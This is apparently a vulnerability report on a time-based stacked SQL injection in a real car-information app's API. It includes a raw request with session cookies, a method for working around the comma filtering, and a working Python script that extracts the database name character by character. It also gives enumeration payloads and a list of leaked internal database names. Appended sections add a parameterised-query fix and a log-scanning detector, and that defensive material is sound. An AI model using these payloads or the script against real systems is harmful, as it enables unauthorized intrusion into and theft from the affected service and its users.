Target: Yiche.com (易车网) official app. Testing found the following location to be injectable: (the carids field in the POST body, stacked queries)
POST http://api.ycapp.yiche.com/Car/GetCarStylePropertys HTTP/1.1
Host: api.ycapp.yiche.com
Cookie: __cs_visitor=1445701271467275; __v3_cs_skey_10027=4hmi4s; a=Rw0qZ0AXX3h5; tsc=3_562ba697_562ba697_0_1
Accept-Encoding: gzip,deflate
X-Requested-With: XMLHttpRequest
Content-Length: 109
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

carids=114069,114070,114071,114018,114065,114067,114064,114066,114068,102164,102159,102163,102155,102148,102147,102152
SQLMap evidence screenshot:
Looking at the site, there did not seem to be any filtering or WAF in place, yet SQLMap failed to extract the database name.

I. Data extraction method

On closer study it turned out that, because this parameter already contains commas, the application script treats the comma as a delimiter and consumes it before anything reaches the database. Commas are therefore effectively filtered: the injected statement cannot contain one. On MySQL one could simply replace substr(user(),1,1) with substr(user() from 1 for 1), but this database is MSSQL, which only supports substring(user,1,1) and so requires commas. The workaround was string comparison: MSSQL compares strings character by character by ASCII value, regardless of length, and stops as soon as the first N characters decide the ordering. Using this, values such as DB_NAME() can be derived one character at a time. For example:
; if(db_name()>'Y') waitfor delay '0:0:5'-- -
; if(db_name()>'YI') waitfor delay '0:0:5'-- -
Just keep enumerating the final character. The Python program is as follows, using the 11-character current database name as the example (the program sends requests through a proxy; remove it if you do not need one):
#!/usr/bin/env python
#coding=utf8
# Python 2 script (httplib, print statement). Derives db_name() one character at a time
# by comparing db_name() < known_prefix + candidate and watching for the 5 s delay.
import httplib, urllib, re, time

count = 0            # 1 after the first delayed response; the same candidate is retried once to confirm
user_name = ''       # characters recovered so far
httpClient = None
for i in range(1,15):
    a = 33           # first printable ASCII character
    while a < 128:
        try:
            params = 'carids=114069;if(db_name()<\''+user_name+chr(a)+'\') waitfor delay \'0:0:5\' -- -'
            headers = {"Host": "api.ycapp.yiche.com",
                       "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
                       "Accept-Encoding": "gzip,deflate",
                       "Accept": "*/*",
                       "Cookie": "__cs_visitor=1445701271467275; __v3_cs_skey_10027=4hmi4s; a=Rw0qZ0AXX3h5; tsc=3_562ba697_562ba697_0_1",
                       "Connection": "keep-alive",
                       "X-Requested-With": "XMLHttpRequest",
                       "Content-Type": "application/x-www-form-urlencoded",
                       "Content-Length": len(params)}
            # 192.168.1.2:8888 is the author's local proxy; the request is relayed through it
            httpClient = httplib.HTTPConnection("192.168.1.2", 8888, timeout=30)
            httpClient.request("POST", "http://api.ycapp.yiche.com/Car/GetCarStylePropertys", params, headers)
            st = time.time()
            response = httpClient.getresponse()
            #rp = response.read()
            if count == 1:
                # second, confirming request for the same candidate
                if time.time()-st > 5:
                    # db_name() < prefix+chr(a) held twice, so the next character is chr(a-1)
                    user_name = user_name + chr(a-1)
                    print "db_name: "+user_name
                    count = 0
                    break
                else:
                    count = 0
            else:
                if time.time()-st > 5:
                    # first delayed response: step back one and re-test the same candidate
                    count = 1
                    a = a - 1
            a = a+1
        except Exception, e:
            print e
        finally:
            if httpClient:
                httpClient.close()
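As an added defensive illustration, not part of the original report and not the site's own code, the following reconstructs the flawed pattern the report describes (the server splits carids on commas and splices the pieces straight back into SQL text) beside a hardened version that validates every id as a decimal integer and passes it as a bound parameter. The table and column names, the id limit and the use of sqlite3 as a stand-in for the MSSQL backend are all assumptions.

```python
import re
import sqlite3

# Reconstruction (assumed, not the site's code) of the behaviour the report describes:
# the server splits carids on ',' and splices the pieces straight back into SQL text.
# The split removes commas, but ';', quotes and keywords pass through untouched.
def build_query_unsafe(carids):
    pieces = [p.strip() for p in carids.split(",") if p.strip()]
    return "SELECT CarId, Name FROM CarStyle WHERE CarId IN (" + ",".join(pieces) + ")"

# Hardened form: an allow-list check on each id plus bound parameters, so user input
# never becomes part of the statement text at all.
ID_RE = re.compile(r"^[0-9]{1,10}$")
MAX_IDS = 50  # assumed upper bound on ids per request

def parse_car_ids(carids):
    """Return the ids as integers, or raise ValueError on anything that is not a plain id list."""
    pieces = [p.strip() for p in carids.split(",")]
    if len(pieces) > MAX_IDS:
        raise ValueError("too many ids")
    ids = []
    for piece in pieces:
        if not ID_RE.match(piece):
            raise ValueError("invalid car id: %r" % piece)
        ids.append(int(piece))
    return ids

def build_query_safe(carids):
    """Build a parameterised IN (...) query: one '?' placeholder per validated id."""
    ids = parse_car_ids(carids)
    placeholders = ",".join("?" * len(ids))
    sql = "SELECT CarId, Name FROM CarStyle WHERE CarId IN (%s) ORDER BY CarId" % placeholders
    return sql, ids

def lookup(conn, carids):
    """Run the safe query and return the matching CarId values in ascending order."""
    sql, args = build_query_safe(carids)
    return [row[0] for row in conn.execute(sql, args)]

def demo_db():
    """Constructed in-memory table standing in for the real backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE CarStyle (CarId INTEGER PRIMARY KEY, Name TEXT)")
    conn.executemany("INSERT INTO CarStyle VALUES (?, ?)",
                     [(114069, "style A"), (114070, "style B"), (102164, "style C")])
    return conn

if __name__ == "__main__":
    conn = demo_db()
    print(lookup(conn, "114069,102164,999"))
    print(build_query_unsafe("114069;if(1=1) waitfor delay '0:0:5' -- -"))
    try:
        parse_car_ids("114069;if(1=1) waitfor delay '0:0:5' -- -")
    except ValueError as exc:
        print("rejected:", exc)
```

The point of the comparison is that stripping commas changes which payloads work but never makes the concatenation safe; only the combination of a strict allow-list on the input and parameter binding removes the injection.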
II. Proof of data

1) Current database: YICHEMOBILE
;if(db_name='XXX') waitfor delay '0:0:3' -- -
(XXX is enumerated using the method from section I)
2) Number of databases: 25 in total
carids=114069;if((select count(*) from master.dbo.sysdatabases)=25) waitfor delay '0:0:3' -- -
3) All database names; only some are listed here, the rest were not dumped
carids=114069;if((select name from master.dbo.sysdatabases where dbid=YYY)='XXX') waitfor delay '0:0:3' -- -
(XXX enumerated using the method from section I, YYY from 1 to 25, which walks all 25 database names)
================
MASTER
TEMPDB
MODEL
MSDB
BITAUTOUSERCRM
BITAUTOBI
BITAUTOUGCMONITOR
YICHEMALLPAYMENT
MARKETINVOICE
DEALERASSISTANTSYSTEM
YICHEMOBILE
YICHEMOBILECOMMUNITY
YICHEACTIVITY
YICHEMEDIA
YICHEMOBILESUBSCRIBE
MARKETCOUPONS
......
......
================
4) Now the current database, YICHEMOBILE: 930 tables in total
carids=114069;if((select count(*) from yichemobile.dbo.sysobjects)=930) waitfor delay '0:0:5' -- -
5) Two table names as a sample; the other tables and the actual data were not explored further
carids=114069;if((select top 1 name from yichemobile.dbo.sysdatabases)='XXX') waitfor delay '0:0:3' -- -
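Added detection example, not from the original report: a scanner over constructed request-log lines (status, latency in milliseconds, method, path, URL-encoded body) that flags what the injection above looks like from the server side: a carids value that is not a pure comma-separated integer list, a stacked statement after a semicolon, a WAITFOR DELAY token, and a response time consistent with a time-based probe. The log format, the field names and the 3000 ms threshold are assumptions; the two long bodies reuse probes shown in the report.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines: "<status> <latency_ms> <method> <path> <url-encoded body>".
SAMPLE_LOG = """\
200 0142 POST /Car/GetCarStylePropertys carids=114069,114070,114071
200 5213 POST /Car/GetCarStylePropertys carids=114069%3Bif(db_name()%3C'Y')+waitfor+delay+'0%3A0%3A5'+--+-
200 0098 POST /Car/GetCarStylePropertys carids=102164,102159
200 5101 POST /Car/GetCarStylePropertys carids=114069;if((select+count(*)+from+master.dbo.sysdatabases)=25)+waitfor+delay+'0:0:3'+--+-
200 0131 POST /Car/GetCarStylePropertys carids=abc
"""

ID_LIST_RE = re.compile(r"^[0-9]+(,[0-9]+)*$")           # shape of a legitimate carids value
STACKED_RE = re.compile(r";\s*(if|select|exec|waitfor|declare)\b", re.I)
DELAY_RE = re.compile(r"waitfor\s+delay", re.I)
SLOW_MS = 3000                                           # assumed latency threshold

def parse_body(body):
    """Decode an application/x-www-form-urlencoded body by hand, so ';' inside a value
    is kept as data rather than treated as a pair separator (parse_qs did that in older Pythons)."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields

def inspect_line(line):
    """Return the findings for one log line, in a fixed order; empty when nothing is suspicious."""
    status, latency, method, path, body = line.split(" ", 4)
    carids = parse_body(body).get("carids", "")
    findings = []
    if not ID_LIST_RE.match(carids):
        findings.append("malformed-id-list")
    if STACKED_RE.search(carids):
        findings.append("stacked-query")
    if DELAY_RE.search(carids):
        findings.append("time-delay")
    if int(latency) >= SLOW_MS:
        findings.append("slow-response")
    return findings

def scan(log_text):
    """Return (1-based line number, findings) for every line that produced any finding."""
    results = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        findings = inspect_line(line)
        if findings:
            results.append((number, findings))
    return results

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

The malformed-id-list check is the strongest signal here because it is tied to what the endpoint legitimately accepts, and it catches probes that avoid the keyword patterns; the latency check on its own only corroborates, since slow responses have many benign causes.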